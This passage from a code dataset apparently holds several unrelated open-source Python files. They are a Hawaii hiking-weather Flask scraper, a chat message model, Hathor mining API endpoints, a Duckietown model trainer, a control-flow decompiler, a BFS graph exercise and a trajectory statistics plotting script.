requests.get('https://forecast.weather.gov/product.php?issuedby=HFO&product=AFD&site=hfo')\n# res.raise_for_status()\n# bs4.BeautifulSoup(res.text, features='lxml')\n#\n# soup = bs4.BeautifulSoup(res.text, features='lxml')\n# soup.find('#localcontent > pre')\n#\n# syn1 = soup.select('#localcontent > pre')\n#\n# syn2 = syn1[0]\n# syn3 = str(syn2)\n# syn4 = syn3[0:-1]\n#\n# syn5 = syn4.index('SYNOPSIS')\n# syn6 = syn4.index('DISCUSSION')\n#\n# syn7 = int(syn5 + 11)\n# syn8 = int(syn6 - 14)\n#\n# syn = syn3[syn7:syn8]\n\n################ WWA's ################\n\nres = requests.get('https://www.weather.gov/wwamap/wwatxtget.php?cwa=hfo&wwa=all')\nres.raise_for_status()\nbs4.BeautifulSoup(res.text, features='lxml')\n\nsoup = bs4.BeautifulSoup(res.text, features='lxml')\nheadlines = soup.find_all('h3')\ndef sort_wwas():\n try:\n h0 = headlines[0].contents[0]\n except IndexError:\n h0 = \"None\"\n try:\n h1 = headlines[1].contents[0]\n except IndexError:\n h1 = \"\"\n try:\n h2 = headlines[2].contents[0]\n except IndexError:\n h2 = \"\"\n try:\n h3 = headlines[3].contents[0]\n except IndexError:\n h3 = \"\"\n try:\n h4 = headlines[4].contents[0]\n except IndexError:\n h4 = \"\"\n\n return(h0, h1, h2, h3, h4)\n\nh0 = sort_wwas()[0]\nh1 = sort_wwas()[1]\nh2 = sort_wwas()[2]\nh3 = sort_wwas()[3]\nh4 = sort_wwas()[4]\n\n#\n# res = requests.get('https://alerts.weather.gov/cap/hi.php?x=1')\n# res.raise_for_status()\n# bs4.BeautifulSoup(res.text, features='lxml')\n#\n# soup = bs4.BeautifulSoup(res.text, features='lxml')\n# soup.find('body')\n#\n# syn1 = soup.select('body')\n#\n# syn2 = syn1[0]\n# syn3 = str(syn2)\n# syn4 = syn3[0:-1]\n#\n# syn5 = syn4.index('')\n# syn6 = syn4.index('')\n#\n# syn7 = int(syn5 + 9)\n# syn8 = int(syn6)\n#\n# wwa = syn3[syn7:syn8]\n\n #Old code\n\n#syn10 = syn4.index('HFO WATCHES/WARNINGS/ADVISORIES')\n#syn11 = syn4.index('$$')\n\n#syn12 = int(syn10 + 34)\n#syn13 = int(syn11 - 13)\n\n#wwa = syn3[syn12:syn13]\n\n################ Hazards ################\n#\n# res = requests.get('https://forecast.weather.gov/product.php?site=NWS&issuedby=HFO&product=HWO')\n# res.raise_for_status()\n# bs4.BeautifulSoup(res.text, features='lxml')\n#\n# soup = bs4.BeautifulSoup(res.text, features='lxml')\n# soup.find('#local > div:nth-child(3) > span')\n#\n# hzd_sel = soup.select('#local > div:nth-child(3) > span')\n# hzds = str(hzd_sel[0].text).strip()\n\n######################### All Island Forecast\n\nres = requests.get('https://forecast.weather.gov/product.php?issuedby=HFO&product=SFP&site=hfo')\nres.raise_for_status()\nbs4.BeautifulSoup(res.text, features='lxml')\n\nsoup = bs4.BeautifulSoup(res.text, features='lxml')\nsoup.find('#localcontent > pre')\n\nfcst1 = soup.select('#localcontent > pre')\n\nfcst2 = fcst1[0]\nfcst3 = str(fcst2)\nfcst4 = fcst3[0:-1]\n\nkomml = fcst4.find('KAUAI-OAHU-MAUI-MOLOKAI-LANAI-')\nbig_i = fcst4.find('BIG ISLAND OF HAWAII-')\nend = fcst4.find('$$')\n\nkomml_int = int(komml)\nbig_i_int = int(big_i)\nend_int = int(end)\n\nkomml_sect = fcst3[komml_int:big_i_int].strip()\nbig_i_sect = fcst3[big_i_int:-1].strip()\n\nsect1_index1 = komml_sect.index('TO')\nsect1_index2 = komml_sect.index('MPH')\n\nsect1_int1 = int(sect1_index1)\nsect1_int2 = int(sect1_index2 + 4)\n\nkomml_fcst = komml_sect[sect1_int1:sect1_int2].title()\n\nsect2_index1 = big_i_sect.index('TO')\nsect2_index2 = big_i_sect.index('MPH')\n\nsect2_int1 = int(sect2_index1)\nsect2_int2 = int(sect2_index2 + 4)\n\nbig_i_fcst = big_i_sect[sect2_int1:sect2_int2].title()\n\n\n\n#########################\n\nhome = Blueprint('home', __name__)\n\n@home.route(\"/\")\n@home.route(\"/home\")\ndef homeinfo():\n info = \"Hikeit Hawaii\"\n statement = \"Hawaii Hiking Conditions\"\n summary = \"Hawaii's Hiking Weather...Trail Conditions...and Waterfalls\"\n island = \"Hawaiian Islands\"\n general_title = \"Forecast: Hawaiian Islands\"\n\n dawn = hnl_dawn\n sunrise = hnl_sr\n sunset = hnl_ss\n dusk = hnl_dusk\n moon_phase = moon\n\n all_island_fcst = komml_fcst\n big_island_fcst = big_i_fcst\n\n # synopsistitle = \"Synopsis\"\n # synopsis = syn\n\n wwa_title = \"NWS Hazards\"\n #hazards = hzds\n wwa0 = h0\n wwa1 = h1\n wwa2 = h2\n wwa3 = h3\n wwa4 = h4\n\n time = curr_time\n\n uvexposure = \"UV Exposure\"\n uvi = 'UV Index:' + indexnumstring + ' | ' + explvl\n\n return render_template('homev2.html',**locals())\n","repo_name":"richsuds/hikeithawaii","sub_path":"homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"71072421935","text":"\"\"\"\n Model class for chat messages\n\"\"\"\nfrom pydantic import BaseModel\n\n\nclass ChatMessage(BaseModel):\n '''\n Chat message dataclass\n '''\n message_id: str\n user_id: str\n message: str\n room_id: str\n\n def to_dict(self) -> dict:\n '''\n Converts the dataclass to a dictionary\n '''\n return {\n 'message_id': self.message_id,\n 'message': self.message,\n 'user_id': self.user_id,\n 'room_id': self.room_id\n }\n","repo_name":"Abderraouf99/medium-article-source-code","sub_path":"flash-chat/part2/server/src/models/chat_message.py","file_name":"chat_message.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"56"} +{"seq_id":"27673013263","text":"import enum\n\nfrom structlog import get_logger\n\nfrom hathor.api_util import Resource, get_args, set_cors\nfrom hathor.cli.openapi_files.register import register_resource\nfrom hathor.crypto.util import decode_address\nfrom hathor.exception import HathorError\nfrom hathor.transaction.base_transaction import tx_or_block_from_bytes\nfrom hathor.util import api_catch_exceptions, json_dumpb, json_loadb\n\nlogger = get_logger()\n\n\nclass APIError(HathorError):\n \"\"\"Used for aborting and returning an error with optional status code.\"\"\"\n status_code: int\n\n def __init__(self, msg, status_code=400):\n super().__init__(msg)\n self.status_code = status_code\n\n\nclass Capabilities(enum.Enum):\n MERGED_MINING = 'mergedmining'\n\n\n@register_resource\nclass GetBlockTemplateResource(Resource):\n \"\"\" Resource for generating a Block template for mining.\n\n You must run with option `--status `.\n \"\"\"\n isLeaf = True\n\n def __init__(self, manager):\n # Important to have the manager so we can know the tx_storage\n self.manager = manager\n self.log = logger.new()\n\n @api_catch_exceptions\n def render_GET(self, request):\n \"\"\" GET request for /get_block_template/\n \"\"\"\n request.setHeader(b'content-type', b'application/json; charset=utf-8')\n set_cors(request, 'GET')\n\n # params\n raw_args = get_args(request)\n raw_address = raw_args.get(b'address')\n if raw_address:\n address = decode_address(raw_address[0].decode())\n else:\n address = b''\n caps = set(map(lambda s: Capabilities(s.decode()), raw_args.get(b'capabilities', [])))\n merged_mining = Capabilities.MERGED_MINING in caps\n\n if not self.manager.can_start_mining():\n self.log.debug('cannot generate Block Template, node syncing')\n # XXX: HTTP 503 Service Unavailable is suitable for temporary server errors\n raise APIError('Node syncing', 503)\n\n # get block\n # XXX: miner can edit block data and output_script, so it's fine if address is None\n block = self.manager.generate_mining_block(address=address, merge_mined=merged_mining)\n\n # serialize\n data = block.to_json(include_metadata=True)\n data.pop('hash')\n data.pop('inputs')\n data.pop('nonce', None)\n data.pop('aux_pow', None)\n\n return json_dumpb(data)\n\n\n@register_resource\nclass SubmitBlockResource(Resource):\n \"\"\" Resource for submitting a block mined from a template.\n\n Although there isn't any requirement that the mined block is generated from the get_block_template, there may be in\n the future. Furthermore there is always a chance that this node doesn't yet have the parent txs if the template was\n generated elsewhere. The only risk is missing the chance to propagate a block that could have been valid.\n\n You must run with option `--status `.\n \"\"\"\n isLeaf = True\n\n def __init__(self, manager):\n # Important to have the manager so we can know the tx_storage\n self.manager = manager\n self.log = logger.new()\n\n @api_catch_exceptions\n def render_POST(self, request):\n \"\"\" POST request for /submit_block/\n \"\"\"\n request.setHeader(b'content-type', b'application/json; charset=utf-8')\n set_cors(request, 'GET')\n\n data = json_loadb(request.content.read())\n\n tx = tx_or_block_from_bytes(bytes.fromhex(data['hexdata']), storage=self.manager.tx_storage)\n\n if not tx.is_block:\n self.log.debug('expected Block, received Transaction', data=data)\n raise APIError('Not a block')\n\n if not self.manager.can_start_mining():\n self.log.debug('cannot propagate Block, node syncing', data=data)\n raise APIError('Node syncing')\n\n res = self.manager.submit_block(tx)\n\n return json_dumpb({'result': res})\n\n\nGetBlockTemplateResource.openapi = {\n '/get_block_template': {\n 'x-visibility': 'public',\n 'x-rate-limit': {\n 'global': [\n {\n 'rate': '50r/s',\n }\n ],\n 'per-ip': [\n {\n 'rate': '1r/s',\n 'burst': 1,\n 'delay': 3,\n }\n ]\n },\n 'get': {\n 'tags': ['mining'],\n 'operationId': 'get_block_template',\n 'summary': 'EXPERIMENTAL: Get parameters for a miner, pool or proxy, to build mining block.',\n 'parameters': [\n {\n 'name': 'capabilities',\n 'in': 'query',\n 'description': 'Requested capabilities when generating a block template',\n 'schema': {\n 'type': 'array',\n 'items': {\n 'type': 'string',\n 'enum': [i.value for i in Capabilities]\n }\n }\n }\n ],\n 'responses': {\n '200': {\n 'description': 'Success',\n 'content': {\n 'application/json': {\n 'schema': {\n 'type': 'object',\n 'properties': {\n 'timestamp': {\n 'type': 'integer',\n },\n 'version': {\n 'type': 'integer',\n },\n 'weight': {\n 'type': 'number',\n },\n 'parents': {\n 'type': 'array',\n 'items': {\n 'type': 'string',\n }\n },\n 'outputs': {\n 'type': 'array',\n 'items': {\n 'type': 'object',\n 'properties': {\n 'value': {\n 'type': 'integer',\n },\n 'token_data': {\n 'type': 'integer',\n },\n 'script': {\n 'type': 'string',\n },\n }\n }\n },\n }\n }\n }\n }\n }\n }\n }\n }\n}\n\n\nSubmitBlockResource.openapi = {\n '/submit_block': {\n 'x-visibility': 'public',\n 'x-rate-limit': {\n 'global': [\n {\n 'rate': '50r/s',\n 'burst': 10,\n 'delay': 0,\n }\n ],\n 'per-ip': [\n {\n 'rate': '5r/s',\n 'burst': 1,\n 'delay': 0,\n }\n ]\n },\n 'post': {\n 'tags': ['mining'],\n 'operationId': 'submit_block',\n 'summary': 'EXPERIMENTAL: Called by a miner to submit a block they found',\n 'requestBody': {\n 'description': 'Data to be propagated',\n 'required': True,\n 'content': {\n 'application/json': {\n 'schema': {\n 'type': 'object',\n 'properties': {\n 'hexdata': {\n 'type': 'string'\n }\n }\n }\n }\n }\n },\n 'responses': {\n '200': {\n 'description': 'Success',\n 'content': {\n 'application/json': {\n 'schema': {\n 'type': 'object',\n 'properties': {\n 'result': {\n 'type': 'bool'\n }\n }\n }\n }\n }\n }\n }\n }\n }\n}\n","repo_name":"HathorNetwork/hathor-core","sub_path":"hathor/transaction/resources/mining.py","file_name":"mining.py","file_ext":"py","file_size_in_byte":9072,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"56"} +{"seq_id":"72424792814","text":"import argparse\nimport logging\nimport os\nimport time\nfrom datetime import datetime\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n\nfrom my_model import MyModel,NewModel\nfrom log_reader import Reader\n\nMODEL_NAME = \"MyModel\"\nlogging.basicConfig(level=logging.INFO)\n\n\n#! Default Configuration\nEPOCHS = 10000\nINIT_LR = 1e-3\nBATCH_SIZE = 16\nTRAIN_PERCENT = 0.8\nLOG_FILE = \"extended_dataset.log\"\nMODELTYPE=1\n\nEXPERIMENTAL = False\nOLD_DATASET = False\nSTEPS=4\n\nimport os\nfrom tensorflow.python.client import device_lib\n\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0\"\nprint(device_lib.list_local_devices())\nprint(\"Num GPUs Available: \", len(tf.config.list_physical_devices('GPU')))\n\n\nclass DuckieTrainer:\n def __init__(\n self,\n epochs,\n init_lr,\n batch_size,\n log_dir, \n model_name,\n log_file,\n split,\n modeltype,\n window,\n ):\n self.modeltype=modeltype\n self.window=window\n self.model_name = model_name\n print(\"Observed TF Version: \", tf.__version__)\n print(\"Observed Numpy Version: \", np.__version__)\n\n self.create_dir()\n\n try:\n self.observation, self.linear, self.angular = self.get_data(log_file)\n except Exception:\n try:\n self.observation, self.linear, self.angular = self.get_data(log_file)\n except Exception:\n logging.error(\"Loading dataset failed... exiting...\")\n exit(1)\n logging.info(f\"Loading Datafile completed\")\n\n # 2. Split training and testing\n (\n observation_train,\n observation_valid,\n linear_train,\n linear_valid,\n angular_train,\n angular_valid,\n ) = train_test_split(self.observation, self.linear, self.angular, test_size=1 - split, shuffle=True)\n\n model = self.configure_model(learning_rate=init_lr, epochs=epochs)\n\n callbacks_list = self.configure_callbacks()\n\n # 11. GO!\n history = model.fit(\n x=observation_train,\n y={\"Linear\": linear_train, \"Angular\": angular_train},\n validation_data=(\n observation_valid,\n {\"Linear\": linear_valid, \"Angular\": angular_valid},\n ),\n epochs=epochs,\n callbacks=callbacks_list,\n shuffle=True,\n batch_size=batch_size,\n verbose=0,\n )\n\n model.save(f\"trainedModel/{self.model_name}.h5\")\n\n def create_dir(self):\n try:\n os.makedirs(\"trainedModel\")\n except FileExistsError:\n print(\"Directory already exists!\")\n except OSError:\n print(\"Create folder for trained model failed. Please check system permissions.\")\n exit()\n\n def configure_model(self, learning_rate, epochs):\n losses = {\"Linear\": \"mse\", \"Angular\": \"mse\"}\n lossWeights = {\"Linear\": 2, \"Angular\": 10}\n if self.modeltype==0:\n model = MyModel.build(200, 150)\n if self.modeltype==1:\n model = NewModel.build(self.window, 200, 150)\n opt = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n model.compile(optimizer=opt, loss=losses, loss_weights=lossWeights, metrics=\"mse\")\n return model\n\n def configure_callbacks(self):\n tensorboard = tf.keras.callbacks.TensorBoard(\n log_dir=\"trainlogs/{}\".format(f'{self.model_name}-{datetime.now().strftime(\"%Y-%m-%d@%H-%M-%S\")}')\n )\n\n filepath1 = f\"trainedModel/{self.model_name}Best_Validation.h5\"\n checkpoint1 = tf.keras.callbacks.ModelCheckpoint(\n filepath1, monitor=\"val_loss\", verbose=1, save_best_only=True, mode=\"min\"\n )\n\n # ? Keep track of the best loss model\n filepath2 = f\"trainedModel/{self.model_name}Best_Loss.h5\"\n checkpoint2 = tf.keras.callbacks.ModelCheckpoint(\n filepath2, monitor=\"loss\", verbose=1, save_best_only=True, mode=\"min\"\n )\n\n return [checkpoint1, checkpoint2, tensorboard]\n\n def get_data(self, file_path, old_dataset=False):\n \"\"\"\n Returns (observation: np.array, linear: np.array, angular: np.array)\n \"\"\"\n reader = Reader(file_path)\n\n observation, linear, angular = reader.read() if old_dataset else reader.modern_read()\n\n if self.modeltype==1 :\n ########Data transformation###################\n observation = [ observation[x:x+self.window] for x in range(0,int(len(observation)/self.window)) ]\n print(1)\n linear = [ linear[x:x+self.window] for x in range(0,int(len(linear)/self.window)) ]\n print(2)\n angular = [ angular[x:x+self.window] for x in range(0,int(len(angular)/self.window)) ]\n print(3)\n\n print(np.array(observation).shape)\n print(np.array(linear).shape)\n print(np.array(angular).shape)\n ############# Datatransformation ###############\n\n logging.info(\n f\"\"\"Observation Length: {len(observation)}\n Linear Length: {len(linear)}\n Angular Length: {len(angular)}\"\"\"\n )\n return (np.array(observation), np.array(linear), np.array(angular))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Training Parameter Setup\")\n parser.add_argument(\"--epochs\", help=\"Set the total training epochs\", default=EPOCHS)\n parser.add_argument(\"--learning_rate\", help=\"Set the initial learning rate\", default=INIT_LR)\n parser.add_argument(\"--batch_size\", help=\"Set the batch size\", default=BATCH_SIZE)\n parser.add_argument(\"--log_dir\", help=\"Set the training log directory\", default=\"\")\n parser.add_argument(\"--log_file\", help=\"Set the training log file name\", default=LOG_FILE)\n parser.add_argument(\"--model_name\", help=\"Set the training log file name\", default=MODEL_NAME)\n parser.add_argument(\"--modeltype\", help=\"Set modeltype\", default=MODELTYPE)\n parser.add_argument(\"--window\", help=\"Set windowsize in case of LSTM\", default=STEPS)\n parser.add_argument(\n \"--split\",\n help=\"Set the training and test split point (input the percentage of training)\",\n default=TRAIN_PERCENT,\n )\n\n args = parser.parse_args()\n\n \n\n DuckieTrainer(\n epochs=int(args.epochs),\n init_lr=float(args.learning_rate),\n batch_size=int(args.batch_size),\n log_dir=args.log_dir,\n log_file=args.log_file,\n model_name = args.model_name,\n split=float(args.split),\n modeltype=int(args.modeltype),\n window=int(args.window)\n )\n","repo_name":"fdominik98/DSD-DuckieTown","sub_path":"training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"771969480","text":"from itertools import groupby\nimport insn\n\ndef till(asm, end, brk=None, hasaddr=True):\n\tbody = []\n\taddr = None\n\twhile asm[0].pos != end:\n\t\ta, asm = parse(asm, brk=brk)\n\t\tif not asm:\n\t\t\traise ValueError(f\"Did not find {int(end)}\")\n\n\t\tif hasaddr and a.name == \"GOTO\" and asm[0].pos == end:\n\t\t\t(addr,) = a.args\n\t\telse:\n\t\t\tbody.append(a)\n\treturn body, addr, asm\n\ndef parse(asm, brk=None):\n\tif asm[0].name == \"GOTO\" and asm[0].args[0] == brk:\n\t\treturn insn.Insn(\"BREAK\"), asm[1:]\n\n\tif asm[0].name == \"IF\":\n\t\thead = asm[0]\n\t\tbody, addr, asm_ = till(asm[1:], head.args[1], brk=head.args[1])\n\t\tif addr == head.pos:\n\t\t\treturn insn.Insn(\"WHILE\", head.args[0], body), asm_\n\n\t\tiftrue, addr, asm_ = till(asm[1:], head.args[1], brk=brk)\n\t\tcases = [(head.args[0], iftrue)]\n\t\tif addr is not None:\n\t\t\tiffalse, _, asm_ = till(asm_, addr, brk=brk, hasaddr=False)\n\t\t\tif len(iffalse) == 1 and iffalse[0].name == \"IF\":\n\t\t\t\tcases.extend(iffalse[0].args[0])\n\t\t\telse:\n\t\t\t\tcases.append((None, iffalse))\n\n\t\treturn insn.Insn(\"IF\", cases), asm_\n\n\tif asm[0].name == \"SWITCH\":\n\t\thead = asm[0]\n\t\tasm_ = asm[1:]\n\t\tgroups = groupby(sorted(head.args[1] + [(None, head.args[2])], key=lambda a: a[1]), key=lambda a: a[1])\n\t\tgroups = [(a, tuple(b for b, _ in b)) for a, b in groups]\n\t\tassert len(groups) >= 2\n\n\t\t_, endpos, _ = till(asm_, groups[1][0])\n\t\tif endpos is None:\n\t\t\tassert groups[-1][1] == (None,)\n\t\t\tendpos = groups[-1][0]\n\t\t\t_, endpos2, _ = till(asm_, groups[-1][0])\n\t\t\tif endpos2 is not None:\n\t\t\t\tendpos = endpos2\n\t\t\telse:\n\t\t\t\tgroups.pop()\n\n\t\tcases = {}\n\t\tends = [addr for addr, _ in groups[1:]] + [endpos]\n\t\tfor (addr, k), end in zip(groups, ends):\n\t\t\tfor k_ in k[:-1]:\n\t\t\t\tcases[k_] = []\n\t\t\tcases[k[-1]], _, asm_ = till(asm_, end, brk=endpos, hasaddr=False)\n\t\treturn insn.Insn(\"SWITCH\", head.args[0], cases), asm_\n\n\treturn asm[0], asm[1:]\n\nclass Decompiled(list):\n\traw: list\n\ndef decompile(asm):\n\to = Decompiled()\n\to.raw = asm\n\twhile asm:\n\t\ta, asm = parse(asm)\n\t\to.append(a)\n\treturn o\n\ndef compile(expr, label, brk=None):\n\tfor op in expr:\n\t\tif op.name == \"BREAK\":\n\t\t\tyield insn.Insn(\"GOTO\", brk)\n\n\t\telif op.name == \"IF\":\n\t\t\tend = label()\n\t\t\thas_else = False\n\t\t\tfor cond, body in op.args[0]:\n\t\t\t\tif has_else:\n\t\t\t\t\traise ValueError(\"invalid else\", op)\n\t\t\t\tif cond is None:\n\t\t\t\t\thas_else = True\n\t\t\t\t\tyield from compile(body, label, brk)\n\t\t\t\telse:\n\t\t\t\t\tl = label()\n\t\t\t\t\tyield insn.Insn(\"IF\", cond, l)\n\t\t\t\t\tyield from compile(body, label, brk)\n\t\t\t\t\tyield insn.Insn(\"GOTO\", end)\n\t\t\t\t\tyield l\n\t\t\tyield end\n\n\t\telif op.name == \"WHILE\":\n\t\t\tl = label()\n\t\t\tend = label()\n\t\t\tyield l\n\t\t\tyield insn.Insn(\"IF\", op.args[0], end)\n\t\t\tyield from compile(op.args[1], label, end)\n\t\t\tyield insn.Insn(\"GOTO\", l)\n\t\t\tyield end\n\n\t\telif op.name == \"SWITCH\":\n\t\t\tend = label()\n\t\t\tlabels = [label() for _ in op.args[1]]\n\t\t\tyield insn.Insn(\n\t\t\t\t\"SWITCH\",\n\t\t\t\top.args[0],\n\t\t\t\t[(k, l) for k, l in zip(op.args[1], labels) if k is not None],\n\t\t\t\tlabels[-1] if None in op.args[1] else end\n\t\t\t)\n\t\t\tfor l, code in zip(labels, op.args[1].values()):\n\t\t\t\tyield l\n\t\t\t\tyield from compile(code, label, end)\n\t\t\tyield end\n\n\t\telse:\n\t\t\tyield op\n","repo_name":"Kyuuhachi/Inevitable-Zero","sub_path":"decompile.py","file_name":"decompile.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"56"} +{"seq_id":"73398918894","text":"'''\nCode : BFS Traversal\n\nGiven an undirected and disconnected graph G(V, E), print its BFS traversal.\n\nNote:\n1. Here you need to consider that you need to print BFS path starting from vertex 0 only. \n2. V is the number of vertices present in graph G and vertices are numbered from 0 to V-1. \n3. E is the number of edges present in graph G.\n4. Take graph input in the adjacency matrix.\n5. Handle for Disconnected Graphs as well\n\nInput Format :\nThe first line of input contains two integers, that denote the value of V and E.\nEach of the following E lines contains space separated two integers, that denote that there exists an edge between vertex a and b.\n\nOutput Format :\nPrint the BFS Traversal, as described in the task.\n\nConstraints :\n0 <= V <= 1000\n0 <= E <= (V * (V - 1)) / 2\n0 <= a <= V - 1\n0 <= b <= V - 1\n\nTime Limit: 1 second\n\nSample Input 1:\n4 4\n0 1\n0 3\n1 2\n2 3\n\nSample Output 1:\n0 1 3 2\n'''\n\nimport queue\nfrom sys import stdin\n\nclass Graph :\n def __init__ (self,nVertices):\n self.nVertices = nVertices\n self.adjMatrix = [[ 0 for i in range(nVertices)] for j in range(nVertices)]\n def addEdge (self,v1,v2):\n self.adjMatrix[v1][v2] = 1\n self.adjMatrix[v2][v1] = 1\n def __bfs (self, sv, visited):\n q = queue. Queue()\n q.put(sv)\n visited[sv] = True\n while q.empty() is False :\n u = q.get()\n print(u, end= \" \" )\n for i in range(self.nVertices) :\n if self.adjMatrix[u][i] > 0 and visited[i] is False :\n q.put(i)\n visited[i] = True\n def bfs (self):\n visited = [ False for i in range(self.nVertices)]\n for i in range(self.nVertices):\n if visited[i] is False :\n self.__bfs(i, visited)\n\n#main\nv, e = input().strip().split(' ')\nv = int(v)\ne = int(e)\ng = Graph(v)\nif v != 0 and e != 0:\n for i in range(e):\n li = stdin.readline().rstrip().split(\" \")\n x = int(li[0])\n y = int(li[1])\n g.addEdge(x, y)\n g.bfs()\nelif v != 0 and e == 0:\n for i in range(v):\n print(i, end=' ')","repo_name":"jarvis-1805/DSAwithPYTHON","sub_path":"Graphs/Graphs/BFS_Traversal.py","file_name":"BFS_Traversal.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"38503628391","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 8 23:26:52 2017\r\n\r\n@author: Bernard Legras\r\n\"\"\"\r\nimport numpy as np\r\nimport pickle, gzip\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.colors as colors\r\nfrom mpl_toolkits.basemap import Basemap\r\nimport deepdish as dd\r\nimport socket\r\nfrom os.path import join\r\n# flags\r\nI_DEAD = 0x200000\r\nI_HIT = 0x400000\r\nI_OLD = 0x800000\r\nI_CROSSED = 0x2000000\r\nI_DBORNE = 0x1000000\r\n\r\n# color list with 20 colors\r\n\r\nlistcolors=['#161d58','#253494','#2850a6','#2c7fb8','#379abe','#41b6c4',\r\n '#71c8bc','#a1dab4','#d0ecc0','#ffffcc','#fef0d9','#fedeb1',\r\n '#fdcc8a','#fdac72','#fc8d59','#ef6b41','#e34a33','#cb251a',\r\n '#b30000','#7f0000']\r\nmymap=colors.ListedColormap(listcolors)\r\n\r\n# %%\r\n\"\"\" Defines the domain\r\n\"\"\"\r\ndomain=np.array([[-179.,181.],[-30.,50.]])\r\nbinx = 360; biny = 80\r\n\r\ndeltay = (domain[1,1]-domain[1,0])/biny\r\ndeltax = (domain[0,1]-domain[0,0])/binx\r\nycent = np.arange(domain[1,0] + 0.5*deltay,domain[1,1],deltay)\r\nxcent = np.arange(domain[0,0] + 0.5*deltax,domain[0,1],deltax)\r\nyedge = np.arange(domain[1,0],domain[1,1]+0.1*deltay,deltay)\r\nxedge = np.arange(domain[0,0],domain[0,1]+0.1*deltax,deltax)\r\n# Generate the grid of points\r\nxg = np.tile(xcent,(biny,1))\r\nyg = np.tile(ycent,(binx,1)).T\r\n# Size of the grid\r\nbloc_size = binx * biny\r\nxg = np.reshape(xg,bloc_size)\r\nyg = np.reshape(yg,bloc_size)\r\n\r\nif socket.gethostname() == 'Graphium':\r\n BACK_DIR = 'C:\\\\cygwin64\\\\home\\\\berna\\\\data\\\\STC\\\\STC-BACK-OUT-SAF-OPAQ'\r\nelif socket.gethostname() == 'grapelli':\r\n BACK_DIR = '/limbo/data/STC/STC-BACK-OUT-SAF-OPAQ'\r\nelif socket.gethostname() in ['couperin','zappa','coltrane','puccini']:\r\n BACK_DIR = '/net/grapelli/limbo/data/STC/STC-BACK-OUT-SAF-OPAQ'\r\nelif socket.gethostname() == 'gort':\r\n BACK_DIR = '/dkol/data/STC/STC-BACK-OUT-SAF-OPAQ'\r\n\r\ndef main():\r\n # load the big file containing ended \r\n theta=400\r\n fname1 = join(BACK_DIR,'BACK-EIZ-FULL-Jul-2017-'+str(theta)+'K.hdf5z')\r\n fname2 = join(BACK_DIR,'BACK-EIZ-FULL-Aug-2017-'+str(theta)+'K.hdf5z')\r\n\r\n h_hits_m = {}\r\n h_dborne_m = {}\r\n h_old_m = {}\r\n h_dead_m = {}\r\n H_m = {}\r\n \r\n i=0\r\n for fname in [fname1,fname2]: \r\n ended = dd.io.load(fname)\r\n \r\n # number of parcels launched per bin\r\n bin_size = int(len(ended['src']['x'])/bloc_size)\r\n # percentage of parcels hiting a cloud\r\n j_hits = np.where(ended['flag_source'] & I_HIT == I_HIT)[0] % bloc_size\r\n h_hits_m[i] = 100*np.histogram(j_hits,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n del(j_hits)\r\n # percentage of deadborne parcels\r\n # j_dborne = np.where(ended['flag_source'] & I_DBORNE == I_DBORNE)[0] % bloc_size\r\n # h_dborne = 100*np.histogram(j_dborne,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n # del(j_dborne)\r\n # percentage of parcels ending as too old\r\n j_old = np.where(ended['flag_source'] & I_OLD == I_OLD)[0] % bloc_size\r\n h_old_m[i] = 100*np.histogram(j_old,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n del(j_old)\r\n # percentage of parcels ending by crossing the edges\r\n j_dead = np.where(ended['flag_source'] & I_CROSSED == I_CROSSED)[0] % bloc_size\r\n h_dead_m[i] = 100*np.histogram(j_dead,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n del(j_dead)\r\n x_hits = ended['src']['x'][ended['flag_source'] & I_HIT == I_HIT]\r\n y_hits = ended['src']['y'][ended['flag_source'] & I_HIT == I_HIT]\r\n H_m[i]=np.histogram2d(y_hits,x_hits,bins=[biny,binx],range=domain[::-1])[0]\r\n i += 1\r\n \r\n h_hits = 0.5*(h_hits_m[0] + h_hits_m[1])\r\n #h_dborne = 0.5*(h_dborne_m[0] + h_dborne_m[1])\r\n h_old = 0.5*(h_old_m[0] + h_old_m[1])\r\n h_dead = 0.5*(h_dead_m[0] + h_dead_m[1])\r\n # percentage of still alive parcels\r\n #j_alive = np.where(ended['flag_source'] == 0)[0] % bloc_size\r\n #h_alive = 100*np.histogram(j_alive,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n #del(j_alive)\r\n # %%\r\n # plot of the statistics\r\n chart(np.reshape(h_hits,[biny,binx]),vmin=0,vmax=100,txt=\"Percentage of convective hits from EIZ FULL \"+str(theta)+\" K Jul-Aug 2017\",\r\n fgp='EIZ-FULL-percentage-hits-'+str(theta)+'K')\r\n #chart(np.reshape(h_dborne,[biny,binx]),txt=\"percentage of deadborne\")\r\n chart(np.reshape(h_old,[biny,binx]),vmin=0,vmax=100,txt=\"percentage of ending by age\")\r\n chart(np.reshape(h_dead,[biny,binx]),vmin=0,vmax=100,txt=\"percentage of escape\")\r\n #chart(np.reshape(h_alive,[biny,binx]),txt=\"percentage of still alive\")\r\n\r\n # %%\r\n # statistics of the convectives sources\r\n H = 0.5*(H_m[0] + H_m[1])\r\n chart(H,txt=\"distribution of convective sources from EIZ FULL \"+str(theta)+\" K Jul-Aug 2017\",fgp='EIZ-FULL-distrib-sources-'+str(theta)+'K')\r\n\r\n\r\n# # %% 